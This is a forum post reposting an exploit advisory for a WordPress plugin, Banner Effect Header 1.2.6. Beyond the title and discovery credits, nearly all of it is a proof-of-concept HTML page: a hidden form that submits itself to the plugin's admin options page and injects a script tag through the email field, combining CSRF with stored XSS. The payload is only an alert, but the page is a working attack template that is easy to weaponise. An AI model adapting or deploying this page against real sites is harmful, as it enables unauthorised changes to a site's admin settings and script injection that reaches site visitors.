Aerosol Posted January 6, 2015 Report Posted January 6, 2015 |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||-------------------------------------------------------------------------||[*] Exploit Title: Wordpress Banner Effect Header 1.2.6 Plugin XSS, CSRF Vulnerability||[*] Date : Date: 2015-01-02||[*] Exploit Author: Ashiyane Digital Security Team||[*] Vendor Homepage : https://wordpress.org/plugins/banner-effect-header/||[*] Plugin Link : https://downloads.wordpress.org/plugin/banner-effect-header.zip||[*] Tested on: Windows 7||[*] Discovered By : Mahdi.Hidden||-------------------------------------------------------------------------|||[*] Location :http://[localhost]/[path]/wp-admin/options-general.php?page=BannerEffectOptions||-------------------------------------------------------------------------|Exploit Code:<html><body><form name="post_form" method="post" action="http://localhost/wordpress/wp-admin/options-general.php?page=BannerEffectOptions"><input type="hidden" name="banner_effect_submit_hidden" value="Y"><input type="hidden" name="banner_effect_email" value='a@a.com"><script>alert(/xss/)</script>'><script language="Javascript">setTimeout('post_form.submit()', 1);</script></form></body></html>|-------------------------------------------------------------------------|| This is CSRF & XSS|-------------------------------------------------------------------------||-------------------------------------------------------------------------||-------------------------------------------------------------------------||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|Source Quote
